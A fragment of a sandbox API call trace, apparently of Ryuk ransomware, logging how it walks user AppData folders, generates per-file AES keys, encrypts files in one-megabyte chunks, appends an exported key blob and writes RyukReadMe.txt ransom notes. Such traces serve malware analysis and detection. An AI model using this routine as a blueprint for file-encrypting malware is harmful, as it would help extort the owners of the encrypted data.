lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0141.370] CloseHandle (hObject=0x18c) returned 1 [0141.370] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.370] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0141.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.370] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=1206133) returned 1 [0141.370] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=1206133) returned 1 [0141.371] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x126653, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.371] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0141.371] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.371] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0141.371] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.371] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.371] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0141.388] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0141.389] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0141.394] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.394] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0141.399] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0141.399] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x32535, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x32535, lpOverlapped=0x0) returned 1 [0141.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0141.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x32535, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x32540) returned 1 [0141.401] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0141.401] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x32540, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x32540, lpOverlapped=0x0) returned 1 [0141.402] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0141.402] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0141.402] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0141.402] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0141.402] CloseHandle (hObject=0x18c) returned 1 [0141.422] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.426] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.426] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.426] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.426] SetLastError (dwErrCode=0x0) [0141.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.426] GetLastError () returned 0xb7 [0141.426] CloseHandle (hObject=0x18c) returned 1 [0141.426] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0141.426] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.426] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.426] SetLastError (dwErrCode=0x0) [0141.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.428] GetLastError () returned 0x0 [0141.428] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.431] CloseHandle (hObject=0x190) returned 1 [0141.431] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.431] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.431] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.431] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.431] SetLastError (dwErrCode=0x0) [0141.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.432] GetLastError () returned 0x0 [0141.432] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.433] CloseHandle (hObject=0x190) returned 1 [0141.433] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.433] SetLastError (dwErrCode=0x0) [0141.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.433] GetLastError () returned 0xb7 [0141.433] CloseHandle (hObject=0x190) returned 1 [0141.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.433] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.433] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.434] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.434] SetLastError (dwErrCode=0x0) [0141.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\event viewer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.434] GetLastError () returned 0x0 [0141.434] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.435] CloseHandle (hObject=0x190) returned 1 [0141.435] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.435] SetLastError (dwErrCode=0x0) [0141.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.435] GetLastError () returned 0xb7 [0141.435] CloseHandle (hObject=0x190) returned 1 [0141.435] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.437] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.437] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.438] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms", dwFileAttributes=0x80) returned 1 [0141.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.439] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=6656) returned 1 [0141.439] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=6656) returned 1 [0141.439] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x18de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.439] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.440] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.440] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.440] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.440] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.440] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x1a00, lpOverlapped=0x0) returned 1 [0141.441] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.441] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x1a00, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x1a10) returned 1 [0141.441] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.441] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a10, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x1a10, lpOverlapped=0x0) returned 1 [0141.441] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.441] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.441] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.441] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.441] CloseHandle (hObject=0x194) returned 1 [0141.462] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.467] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.468] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.468] SetLastError (dwErrCode=0x0) [0141.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.468] GetLastError () returned 0x0 [0141.468] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.469] CloseHandle (hObject=0x194) returned 1 [0141.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.471] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.471] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.471] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.472] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", dwFileAttributes=0x80) returned 1 [0141.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.472] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=28672) returned 1 [0141.472] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=28672) returned 1 [0141.472] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.472] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.474] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.474] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.474] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.474] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.474] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x7000, lpOverlapped=0x0) returned 1 [0141.475] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.475] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7010) returned 1 [0141.476] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.476] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x7010, lpOverlapped=0x0) returned 1 [0141.476] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.476] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.476] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.476] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.476] CloseHandle (hObject=0x198) returned 1 [0141.497] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.502] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.503] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.503] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.503] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", dwFileAttributes=0x80) returned 1 [0141.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.504] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=28672) returned 1 [0141.504] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=28672) returned 1 [0141.504] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.504] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.505] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.505] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.505] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.505] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.505] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x7000, lpOverlapped=0x0) returned 1 [0141.506] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.506] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7010) returned 1 [0141.506] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.506] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x7010, lpOverlapped=0x0) returned 1 [0141.507] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.507] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 